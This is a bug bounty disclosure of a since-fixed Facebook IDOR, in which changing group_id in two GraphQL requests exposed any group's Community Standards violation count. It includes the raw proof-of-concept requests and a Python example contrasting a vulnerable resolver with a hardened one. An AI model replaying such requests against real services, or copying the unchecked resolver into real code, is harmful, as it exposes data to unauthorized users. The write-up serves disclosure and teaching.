[Facebook] Fetch Group Quality Insights
This would have let any Facebook user grab the "Groups Quality Insights" of a group, which shows the count of posts in that group that violated Community Standards, even when the user was not an admin or a member of the group, and regardless of the group's privacy settings.
POC -
A GraphQL request was vulnerable to IDOR -
==============================
POST /graphql HTTP/1.1
doc_id=2424487570966507&method=post&locale=en_US&pretty=false&format=json&purpose=fetch&variables={"params":{"path":"/groups/violations/dashboard/","params":"{\"group_id\":XXX}","nt_context":{"using_white_navbar":true,"styles_id":"12a814e188c218e88139530938077622","pixel_ratio":1},"extra_client_data":{}},"nt_context":{"using_white_navbar":true,"styles_id":"12a814e188c218e88139530938077622","pixel_ratio":1},"scale":"1"}&fb_api_req_friendly_name=NativeTemplateScreenQuery&fb_api_caller_class=graphservice&fb_api_analytics_tags=["GraphServices"]&server_timestamps=true
================================
The "group_id" could be changed here to any group's ID. The response was still "200 OK" and contained additional info showing the count of violations, e.g. "Community Standard Violations 19 violations".
The equivalent request from the web UI -
================================
POST /api/graphql/ HTTP/1.1
Host: www.facebook.com
av=XXX&__user=XXX&__a=1&__dyn=&__csr=&__req=4u&__be=1&__pc=PHASED:DEFAULT&dpr=1&__rev=1001409913&__s=0u2bvl:0qp5ch:o5evq3&__hsi=6757574787531864103-0&fb_dtsg=AQGd-RfxJLW3:AQGRBiPo-nvy&jazoest=22067&__spin_r=1001409913&__spin_b=trunk&__spin_t=1573370487&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GroupsQualityCSViolationsRootContainerQuery&variables={"groupID":"XXX"}&doc_id=2061462663959034
================================
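Both requests above are the same class of bug: the server looked up the group by the caller-supplied ID and returned its violation dashboard without checking whether the viewer was allowed to see that group's insights. The example below is added here to illustrate the fix and is not Facebook's code; the group model, role names, sample IDs and resolver signatures are assumptions for illustration. It shows a resolver that mirrors the reported behaviour beside a hardened one that authorizes the viewer against the specific object, so the check holds whichever endpoint (app or web GraphQL) issues the query.

```python
"""Added example: object-level authorization for a GraphQL-style resolver.

Models the reported bug: a query takes a group id and returns the group's
quality / violation dashboard. One resolver trusts the id (the IDOR), the
other authorizes the viewer on the loaded object before returning anything.
All data, names and signatures here are constructed for illustration.
"""
from dataclasses import dataclass, field


@dataclass
class Group:
    group_id: int
    privacy: str                                 # "public", "closed" or "secret"
    violation_count: int
    roles: dict = field(default_factory=dict)    # user_id -> "admin" | "member"


# Constructed sample data: two groups, a few members, one admin each.
GROUPS = {
    1001: Group(1001, "public", 19, {7: "admin", 8: "member"}),
    1002: Group(1002, "secret", 3, {9: "admin"}),
}


class Forbidden(Exception):
    """Raised when the viewer may not read the requested object."""


def fetch_quality_insights_vulnerable(viewer_id: int, group_id: int) -> dict:
    """Mirrors the reported bug: the id is trusted and only existence is checked.

    The viewer is authenticated but never authorized against the group, so any
    user can read any group's violation count by changing group_id.
    """
    group = GROUPS.get(group_id)
    if group is None:
        raise KeyError(group_id)
    return {"group_id": group_id, "violations": group.violation_count}


def can_view_quality_insights(viewer_id: int, group: Group) -> bool:
    """Quality insights are an admin tool: require the admin role on this group.

    The decision is made on the object itself, so it applies regardless of the
    group's privacy setting and of which endpoint performs the query.
    """
    return group.roles.get(viewer_id) == "admin"


def fetch_quality_insights(viewer_id: int, group_id: int) -> dict:
    """Hardened resolver: load the object, then authorize the viewer against it."""
    group = GROUPS.get(group_id)
    # Same error for a missing and for an unauthorized group, so the endpoint
    # cannot be used to confirm which group ids exist.
    if group is None or not can_view_quality_insights(viewer_id, group):
        raise Forbidden(f"viewer {viewer_id} may not read insights for group {group_id}")
    return {"group_id": group_id, "violations": group.violation_count}


def probe(resolver, viewer_id: int, group_id: int):
    """Helper for comparing the two resolvers: violation count or 'denied'."""
    try:
        return resolver(viewer_id, group_id)["violations"]
    except (Forbidden, KeyError):
        return "denied"


if __name__ == "__main__":
    # Non-member 999 reads both groups through the vulnerable resolver,
    # but only admins 7 and 9 get through the hardened one.
    for resolver in (fetch_quality_insights_vulnerable, fetch_quality_insights):
        print(resolver.__name__, [probe(resolver, v, g)
                                  for v, g in ((999, 1001), (999, 1002), (8, 1001), (7, 1001), (9, 1002))])
```

The important design choice is that authorization is tied to the loaded object and the viewer's role on it, not to the query's document id or to the group's privacy flag: a public group still restricts its moderation dashboard to admins, and a second endpoint that wraps the same query inherits the same check.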
Timeline -
Reported - Sunday, November 3, 2019
Triaged - Friday, November 8, 2019
Fixed - Tuesday, November 26, 2019
Rewarded - Wednesday, November 27, 2019